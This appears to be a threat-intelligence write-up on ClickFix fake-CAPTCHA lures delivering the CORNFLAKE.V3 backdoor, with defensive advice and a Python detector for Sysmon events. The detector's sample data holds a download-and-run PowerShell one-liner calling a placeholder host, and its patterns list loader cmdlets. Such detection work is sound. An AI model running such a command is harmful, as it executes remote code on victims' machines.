
CORNFLAKE.V3 Backdoor

Threat actors are increasingly using a social-engineering technique known as ClickFix to distribute a backdoor tracked as CORNFLAKE.V3. Researchers attribute the activity to a cluster designated UNC5518, which runs an access-as-a-service operation: fake CAPTCHA pages trick victims into executing commands that install the backdoor, and the resulting access is then resold or shared with other criminal groups for follow-on exploitation.

How the Attack Begins

The infection chain often starts when users interact with SEO-poisoned search results or malicious ads. Victims are redirected to a fake CAPTCHA verification page designed to resemble Cloudflare's Turnstile or another legitimate service. Believing they are solving a verification challenge, users are instead instructed to paste a malicious PowerShell command (which the page has already placed on their clipboard) into the Windows Run dialog (Win+R) and press Enter. The command runs under the user's own account, giving attackers the foothold they need.

Threat Actor Involvement

Access obtained through UNC5518 campaigns has been leveraged by at least two distinct groups:

  • UNC5774 – a financially motivated actor delivering CORNFLAKE to deploy additional payloads.
  • UNC4108 – a group with unclear motives, observed using PowerShell to drop malware such as VOLTMARKER and the NetSupport RAT.

This demonstrates how ClickFix serves as a gateway to a range of follow-on malicious activity.

Inside CORNFLAKE.V3

The CORNFLAKE.V3 backdoor exists in both JavaScript and PHP variants. It is designed to:

  • Fetch and execute payloads over HTTP, including executables, DLLs, JavaScript, batch files, and PowerShell commands.
  • Gather basic system information and send it to an attacker-controlled server, with the traffic routed through Cloudflare tunnels so that it blends in with legitimate traffic.

Unlike its predecessor, CORNFLAKE.V2, which functioned only as a downloader, V3 adds persistence by writing to Windows Registry Run keys and supports a broader range of payloads. At least three payloads have been observed delivered through it:

  • An Active Directory reconnaissance tool
  • A Kerberoasting script for credential theft (service tickets requested for offline password cracking)
  • WINDYTWIST.SEA, a C-based backdoor with capabilities such as reverse shell access, TCP traffic relaying, and lateral movement

Why ClickFix is Dangerous

The ClickFix method has gained momentum in cybercriminal circles because it relies on the victim to do the work. The user runs the command themselves, so no exploit, macro, or downloaded file has to get past email and web gateways or endpoint controls before execution. Common delivery vectors include:

  • Phishing emails
  • Malvertising campaigns
  • Drive-by website compromises

To increase credibility, attackers often impersonate well-known brands, Cloudflare verification checks, or even Discord server verifications.

Commercialization of ClickFix Kits

Since late 2024, ClickFix builders have been advertised on underground forums as 'Win + R' kits. Prices typically range from $200 to $1,500 per month, depending on the features. Individual components, such as source code, landing pages, or command-line scripts, are often sold separately for $200–$500.

Some advanced kits bundle ClickFix builders with other malware loaders and offer:

  • Ready-made landing pages with different lures
  • Commands advertised as bypassing antivirus detection
  • Options for persistence and SmartScreen evasion

Defensive Measures

To counter ClickFix-based infections, organizations should adopt proactive defenses. Recommended steps include:

  • Restricting or disabling the Windows Run dialog where feasible, for example through the Group Policy setting 'Remove Run menu from Start Menu' (the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer), which also blocks the Win+R shortcut. This is a partial control: ClickFix lures can just as easily direct victims to the File Explorer address bar or a terminal window.
  • Conducting regular phishing and social-engineering simulations so that users learn to recognise 'paste this command to verify' prompts.
  • Implementing robust logging and monitoring (process-creation auditing with command lines, PowerShell script block logging, and registry monitoring) to quickly detect script hosts launched from the Run dialog, the command history the dialog leaves under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and new Run-key persistence of the kind CORNFLAKE.V3 establishes.
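The following is an added example, not code from the original page or from the CORNFLAKE operators, showing how the detection points above (and the Run-key persistence described in the "Inside CORNFLAKE.V3" section) can be checked against endpoint telemetry. It takes Sysmon-style process-creation (EventID 1) and registry value-set (EventID 13) records and flags three things: a script host spawned by explorer.exe with loader-like arguments, a RunMRU entry holding a pasted command, and a Run/RunOnce value pointing at a script host or a user-writable path. The field names follow Sysmon's conventions; the event records, the RecordId numbers, the example.invalid URL and the interpreter list are constructed for this example and are assumptions to adjust for your own environment.

```python
# Added example (not from the original page): flag ClickFix-style Run-dialog
# launches, the RunMRU trace they leave, and Run-key persistence in Sysmon-like
# process (EventID 1) and registry value-set (EventID 13) records.
import re
from dataclasses import dataclass

# Interpreters and fetch tools a pasted ClickFix one-liner hands work to.
# Assumption: this list is illustrative; extend it for your environment.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "msiexec.exe", "node.exe",
}

# Command-line traits of pasted loaders: hidden window, encoded command,
# in-memory download-and-run cmdlets, or an inline URL.
LOADER_TRAITS = re.compile(
    r"(?i)(-w(indowstyle)?\s+h(idden)?\b|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\biex\b|invoke-expression|downloadstring|invoke-webrequest|\birm\b|\biwr\b"
    r"|https?://|\bmshta\b)"
)
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run(Once)?\\")
RUNMRU_KEY = re.compile(r"(?i)\\Explorer\\RunMRU\\")
USER_WRITABLE = re.compile(r"(?i)\\(AppData|Temp|ProgramData|Users\\Public)\\")


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path (plain names pass through)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list[Finding]:
    """Return the findings for one event; an empty list means nothing was flagged."""
    findings: list[Finding] = []
    if event.get("EventID") == 1:  # process creation
        image = _basename(event.get("Image", ""))
        parent = _basename(event.get("ParentImage", ""))
        cmdline = event.get("CommandLine", "")
        # The Run dialog launches the pasted command as a child of explorer.exe;
        # a script host there with loader-like arguments is the ClickFix signature.
        if parent == "explorer.exe" and image in SCRIPT_HOSTS and LOADER_TRAITS.search(cmdline):
            findings.append(Finding("clickfix_run_dialog",
                                    f"{image} spawned by explorer.exe: {cmdline}"))
    elif event.get("EventID") == 13:  # registry value set
        target = event.get("TargetObject", "")
        details = event.get("Details", "")
        # The Run dialog records each executed line under Explorer\RunMRU, so the
        # pasted command survives on disk even if process telemetry is missing.
        if RUNMRU_KEY.search(target) and LOADER_TRAITS.search(details):
            findings.append(Finding("runmru_artifact", f"{target} = {details}"))
        # Run/RunOnce values naming a script host or a user-writable path match
        # the Registry Run-key persistence described for CORNFLAKE.V3.
        if RUN_KEY.search(target) and (
            any(host in details.lower() for host in SCRIPT_HOSTS)
            or USER_WRITABLE.search(details)
        ):
            findings.append(Finding("run_key_persistence", f"{target} = {details}"))
    return findings


def scan(events: list[dict]) -> list[tuple[int, Finding]]:
    """Run analyze() over a batch and pair each finding with its RecordId."""
    return [(e["RecordId"], f) for e in events for f in analyze(e)]


# Constructed sample telemetry (not real captures): one ClickFix run plus benign noise.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"'},
    {"RecordId": 2, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"\\1'},
    {"RecordId": 3, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r'wscript.exe "C:\Users\alice\AppData\Roaming\update.js"'},
    # Benign: a user opening a console from the Start menu, and a vendor tray app.
    {"RecordId": 4, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"RecordId": 5, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tray",
     "Details": r'"C:\Program Files\Vendor\tray.exe" /background'},
]

if __name__ == "__main__":
    for record_id, finding in scan(SAMPLE_EVENTS):
        print(f"record {record_id}: {finding.rule}: {finding.detail}")
```

Run as-is it reports records 1, 2 and 3 and stays silent on the two benign records. The explorer.exe parent check is what separates a Run-dialog paste from the same PowerShell launched by a scheduled task or another script, and the RunMRU rule gives a second chance at catching the pasted command from a forensic registry hive when the process event was never collected.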

By focusing on both prevention and early detection, organizations can significantly reduce the risk posed by campaigns involving ClickFix and CORNFLAKE.V3.
